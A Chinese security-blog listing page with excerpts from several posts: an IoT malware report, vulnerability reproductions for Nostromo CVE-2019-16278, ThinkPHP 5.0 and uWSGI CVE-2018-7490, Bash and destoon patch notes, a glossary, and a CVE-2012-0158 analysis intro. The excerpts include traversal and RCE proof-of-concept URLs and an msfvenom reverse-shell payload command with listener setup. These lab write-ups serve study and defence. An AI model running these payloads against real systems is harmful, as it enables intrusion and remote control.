漏洞

IoT设备上的恶意软件——通过漏洞、弱密码渗透

两盒软妹~` 提交于 2019-12-02 03:30:16
2018年,是 IoT 高速发展的一年,从空调到电灯,从打印机到智能电视,从路由器到监控摄像头统统都开始上网。随着5G网络的发展,我们身边的 IoT 设备会越来越多。与此同时,IoT 的安全问题也慢慢显露出来。 腾讯安全云鼎实验室对 IoT 安全进行了长期关注,本文通过云鼎实验室听风威胁感知平台收集的 IoT 安全情报进行分析,从IoT 的发展现状、IoT 攻击的常见设备、IoT 攻击的主要地区和 IoT 恶意软件的传播方式等方面进行介绍。 一、IoT的发展现状 图片来自网络 近几年 IoT 设备数量飞速增长, 2018年一共有70亿台 IoT 设备,每年保持20%左右的速度增长,到2020年预计 IoT 设备可达99亿台。 图 全球 IoT 设备增长趋势 数据来源: State of the IoT 2018: Number of IoT devices now at 7B – Market accelerating 随着 IoT 设备的普及,IoT 安全问题越来越多。根据卡巴斯基 IoT 安全报告 New trends in the world of IoT threats ,近年来捕获到的 IoT 恶意样本数量呈现爆炸式的增长,从侧面反映了 IoT 安全问题越来越严峻。 图 IoT 恶意样本数量 数据来源:卡巴斯基 New trends in the world of IoT

[漏洞复现]:CVE-2019-16278 Nostromo web server RCE

£可爱£侵袭症+ 提交于 2019-12-02 03:12:51
漏洞描述 Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。 漏洞原因是web服务在对URL进行检查是在URL被解码前,攻击者可以将 / 转换为 %2f 就可绕过检查,之前出现过类似漏洞CVE-2011-0751,POC如下: http://www.example.org/..%2flogs/access_log 利用前提 Nostromo version <= 1.9.6 漏洞复现 Python POC: https://github.com/sudohyak/exploit/blob/master/CVE-2019-16278/exploit.py mark@mark-Pc:~/nhttpd-exploits$ ./CVE-2019-16278.sh 127.0.0.1 80 id uid=1000(mark) gid=1000(mark) groups=1000(mark),0(root) EXP: https://git.sp0re.sh/sp0re/Nhttpd-exploits 参考 https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html?utm_source=webcode.ca&utm_medium=web&utm

Bash bug漏洞目前最新最全的修复方式

烂漫一生 提交于 2019-12-02 03:04:36
Bash bug漏洞已经爆过2天时间,安全狗安全团队已经第一时间向广大用户进行预警。但由于Bash在Linux系统的广泛应用导致众多Linux系统相关主机和设备受到该漏洞的威胁,目前仍有众多服务器主机和设备还未修复该漏洞问题。 由于Bash被应用到到Linux操作系统各个层面的应用,包括OpenSSH、Web Server、系统命令等,单靠某个点的安全防御方案可能无法解决所有问题。针对以上情况,安全狗研究团队整理了目前最新最全的漏洞修复方案。 1、 目前最新最全的修复方式 (1) 更新Bash Shell补丁(优先推荐) Linux系统产商官方已经更新了最新补丁,解决之前补丁仍存在绕过的问题。 安全狗研究团队会第一时间更新,请继续关注 (注意:请您根据Linux版本选择您需要修复的命令, 为了防止意外情况发生,建议您执行命令前先对Linux服务器系统盘打个快照,如果万一出现升级影响您服务器使用情况,可以通过回滚系统盘快照解决。) 更新资源: GNU官方补丁所在地址: http://ftp.gnu.org/pub/gnu/bash/bash-3.0-patches/bash30-018 http://ftp.gnu.org/pub/gnu/bash/bash-3.1-patches/bash31-019 http://ftp.gnu.org/pub/gnu/bash/bash-3.2

Think 框架漏洞利用

…衆ロ難τιáo~ 提交于 2019-12-02 03:03:51
下午有点闲,又没有女朋友陪,该干嘛呢??? 对了,做安全的是不需要女朋友的,哈哈哈哈哈 废话不多说,本机搭建环境; 首先nmap扫描一下,哦哈,有点东西。 开的端口有点多,这个时候有点窃喜,开的端口太少就没思路了唉,开放的端口越多,可能就越危险。 既然开了80端口,那我们就访问一下看看吧! Think V5.0 框架,突然让我想到18年底爆出的该框架的远程命令执行漏洞,嗯,试试看。 Poc链接 /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 出现这个的时候,就说明存在这个漏洞的。 工具执行吧,哈哈哈哈哈 一句话写入,ok,我们用蚁剑链接一下 1、查看自己的IP地址,并根据自己的IP地址及目标靶机的系统类型生成对应的后门文件 ifconfig msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.43.243 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >shell.elf 2、在kali中配置运行监听模块 msfconsole msf5 > use

绿盟-WEB应用漏洞扫描系统

|▌冷眼眸甩不掉的悲伤 提交于 2019-12-02 02:43:05
************************************************** WEB应用漏洞扫描系统 一、工具的介绍与使用 ************************************************** 一、工具的介绍-采纳官网(收费软件哦) 1)介绍:绿盟Web应用漏洞扫描系统,该系统可自动获取网站包含的相关信息,并全面模拟网站访问的各种行为,通过内建的"安全模型"检测Web应用系统潜在的各种漏洞,同时为用户构建从急到缓的修补流程,满足安全检查工作中所需要的高效性和准确性。 2)使用: A.绿盟是公司购买的收费软件,所以账户需要公司统一管理的,申请账户-->登录账户 B.创建一个扫描任务,详细步骤见图文字描述 C.开始扫描任务,实时观察扫描进度 D.查看任务详情,进一步分析扫描结果 F.扫描结果导出 G.模板的配置以及漏洞描述 来源: https://www.cnblogs.com/xjx767361314/p/11725315.html

一些常见网络安全术语

拥有回忆 提交于 2019-12-02 01:46:13
1、黑帽   为非法目的进行黑客攻击的人,通常是为了经济利益。他们进入安全网络以销毁,赎回,修改或窃取数据,或使网络无法用于授权用户。这个名字来源于这样一个事实:老式的黑白西部电影中的恶棍很容易被电影观众识别,因为他们穿着黑色的斯泰森,而“好人”则戴着白帽子。 2、后门   隐藏在计算机系统中的“管道”,绕过登录和密码的正统保护,从而使它们在保护数据方面基本上无效。 3、蛮力攻击   黑客对系统中的每一个可能的密码进行高度密集的自动搜索,从而破坏安全并获得对计算机的访问权限。 4、Doxing   通过在线查看其详细信息,发现并发布互联网用户的身份。黑客专业术语大全 5、灰色的帽子   执行黑客攻击的人,但不是为了个人或经济利益。一个例子是黑客行为,作为更广泛的政治抗议活动的一部分进行,活动家们使一个组织的政策或官方观点被视为诅咒而令人尴尬或羞辱。 6、IP   Internet协议地址-计算机的标识符或“指纹”。这用于识别使用设备的人,跟踪其活动或显示其位置。 7、按键记录   跟踪计算机用户按下哪些键,以便黑客可以将登录代码和密码记录到系统中。 8、恶意软件   旨在控制或窃取计算机数据的程序。 9、网络钓鱼   通过向他们发送看似来自真正的人或组织的电子邮件,重复某人向您提供他们的个人信息,例如密码,银行帐户详细信息(例如PIN号码)和信用卡详细信息。 10、欺骗  

destoon漏洞修复关于 $do->add($post); SQL注入修改

柔情痞子 提交于 2019-12-02 01:44:06
在阿里云漏洞提示查看发现destoon有关于mobile/guestbook.php $do->add($post); SQL注入修改 漏洞名称:Destoon SQL注入 补丁文件:/mobile/guestbook.php 漏洞描述:Destoon的/mobile/guestbook.php中$do->add($post); 这行代码对参数$post未进行正确转义,导致黑客可进行SQL注入,获取网站后台密码等。 修复步骤: 打开文件 Destoon的/mobile/guestbook.php 找到 $do->add($post);   改为: $post = daddslashes($post); $do->add($post);   并且在前面加: $post = daddslashes($post);    来源: https://www.cnblogs.com/68xi/p/11723902.html

uWSGI 漏洞复现(CVE-2018-7490)

↘锁芯ラ 提交于 2019-12-01 23:08:21
uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。 目标: 了解uWSGI CVE-2018-7490漏洞形成原理和漏洞利用方法。 利用搜索工具了解CVE-2018-7490漏洞详情。再利用漏洞获取根目录key.txt的值。 解析思路 http://219.153.49.228:48001/..%2f..%2fkey.txt .. 表示上一级 %2f表示/ 在IP后面输入: ..%2f..%2f..%2f..%2f..%2f..%2f..%2fkey.txt 来源: https://www.cnblogs.com/daiorz/p/11720420.html

Web攻防系列教程之浅析PHP命令注入攻击

最后都变了- 提交于 2019-12-01 22:29:11
摘要:PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。本文描述了常见的PHP命令注入攻击漏洞存在形式和利用方法,结合漏洞实例进行分析和漏洞利用,并针对如何防范PHP命令注入攻击漏洞给出了可行的方法和建议。 PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。本文描述了常见的PHP命令注入攻击漏洞存在形式和利用方法,结合漏洞实例进行分析和漏洞利用,并针对如何防范PHP命令注入攻击漏洞给出了可行的方法和建议。 Command Injection,即命令注入攻击,是指由于Web应用程序对用户提交的数据过滤不严格,导致黑客可以通过构造特殊命令字符串的方式,将数据提交至Web应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者网络资源等。命令注入攻击最初被称为Shell命令注入攻击,是由挪威一名程序员在1997年意外发现的,他通过构造命令字符串的方式从一个网站删除网页,就像从硬盘中删除一个文件一样简单。下面我们结合PHP语言的特性,对PHP命令注入攻击进行简要的分析和描述。 PHP命令注入攻击 PHP命令注入攻击存在的主要原因是Web应用程序员在应用PHP语言中一些具有命令执行功能的函数时

CVE-2012-0158 漏洞分析报告

有些话、适合烂在心里 提交于 2019-12-01 22:28:24
北京蓝森科技有限公司 Office 2003 sp3( CVE-2012-0158 )漏洞分析报告 软件名称 : Office 2003 sp3 软件版本 :2.0 漏洞模块 :MSCOMCTL.ocx 模块版本 :2.0.0.0 编译日期 :2003 操作系统 :Windows XP/2003/7/8.1/10 漏洞编号 :CVE-2012-0158 危害等级 :超危 or 高危 or 中危 or 低危 漏洞类型 :栈溢出 威胁类型 :本地 分析人:缪甜 2019年9月13日 软件简介 Microsoft Office 2003 是微软公司针对Windows操作系统所推出的办公室套装软件,包含WORD、EXCEL、PowerPoint等三大组件,用处广泛,多以普及办公室、行政等。与办公室应用程序一样,它包括联合的服务器和基于互联网的服务。 漏洞成因 2.1漏洞介绍 CVE-2012-0158漏洞是一个栈溢出漏洞,该漏洞是微软Office办公软件中的MSCOMCTL.oce中MSCOMCTL.ListView控件时检查错误造成的,攻击者可以通过精心构造的数据控制程序EIP实现任意代码执行 CVE-2012-0158漏洞的微软编号是ms02-027 2.2复现漏洞 准备:获取造成漏洞的 poc, 安装 office 2003 sp3 使用 winworld直接执行poc效果: 2